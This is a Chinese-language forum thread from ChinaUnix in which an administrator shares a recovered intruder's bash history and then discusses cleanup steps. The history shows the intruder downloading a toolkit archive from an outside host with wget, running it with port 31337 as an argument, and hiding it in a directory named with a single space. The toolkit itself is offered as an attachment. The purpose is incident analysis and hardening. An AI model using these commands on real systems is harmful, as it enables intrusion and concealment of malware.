免费注册 查看新帖 |

Chinaunix

  平台 论坛 博客 文库
最近访问板块 发新帖
查看: 2151 | 回复: 4
打印 上一主题 下一主题

一入侵者的 histroy 文件 [复制链接]

论坛徽章:
0
跳转到指定楼层
1 [收藏(0)] [报告]
发表于 2009-02-25 10:56 |只看该作者 |倒序浏览
w
cat /etc/hosts
passwd
uname -a
ls
cd /tmp
ls
cd /var/tmp
ls
ls -a
mkdir " "
cd " "
ls
wget His_url.hisweb.domain/redone.tar.gz
tar xvf redone.tar.gz
cd redone
ls
./config premiant 31337
./fuck
./run
/sbin/ifconfig -a |grep inet | wc -l
/sbin/ifconfig -a | grep inet

附件中为readon.tar.gz
闯入者操作熟练,但是没有清空 histroy 文件。
mkdir " " 后普通ls 还真看不到
另外可以看到闯入着的常用命令,对于常用的命令 都做了替换, 对于 w uname 改名并设立报警命令
最大的弱点还是还是 系统存在弱密码, 继续加固中 。。。

这个redone 包 大虾们帮忙分析下

[ 本帖最后由 Yerba_ 于 2009-2-25 11:04 编辑 ]

redone.tar.gz

460 KB, 下载次数: 68

论坛徽章:
0
2 [报告]
发表于 2009-02-25 12:00 |只看该作者
现在系统有异常吗?

论坛徽章:
0
3 [报告]
发表于 2009-02-25 12:31 |只看该作者
暂时没发现什么异常,

last
username    pts/1        acad0581.ipt.aol Mon Feb 23 20:48 - 20:50  (00:01)   
username    pts/0        acad0581.ipt.aol Mon Feb 23 20:30 - 20:37  (00:07)   
username    pts/0        inspire.thecompg Mon Feb 23 20:05 - 20:08  (00:03)   

总共登录的时间不长  最早的可能是 扫描发起的机器? 然后 修改了密码
再更换到另一个ip登录, 最后一次 时间不长,看起来像是最后测试

那个 redone 的包 大致看了下, 主体是那个proc , 但是从ps中看到的是   httpd
昨天通过lastlog 看到 不正常登录后
首先通过 ps -ef | grep username 得到 pid kill掉后 一直没特别的现象。
也许当时应该多 trace 仔细分析下,现在包在这里了 供各位分析

已经将 .bash_history 加了 i 附加权限 仔细检查系统不使用的用户
passwd -l 锁定
关闭 /sbin的 一般用户访问 关闭

论坛徽章:
0
4 [报告]
发表于 2009-02-25 16:24 |只看该作者
楼主看下你的服务器任务里是不是多出了点什么。。
vi /etc/crontab

论坛徽章:
0
5 [报告]
发表于 2009-05-21 16:52 |只看该作者
现在怎么样喽?
您需要登录后才可以回帖 登录 | 注册

本版积分规则 发表回复

  

北京盛拓优讯信息技术有限公司. 版权所有 京ICP备16024965号-6 北京市公安局海淀分局网监中心备案编号:11010802020122 niuxiaotong@pcpop.com 17352615567
未成年举报专区
中国互联网协会会员  联系我们:huangweiwei@itpub.net
感谢所有关心和支持过ChinaUnix的朋友们 转载本站内容请注明原作者名及出处

清除 Cookies - ChinaUnix - Archiver - WAP - TOP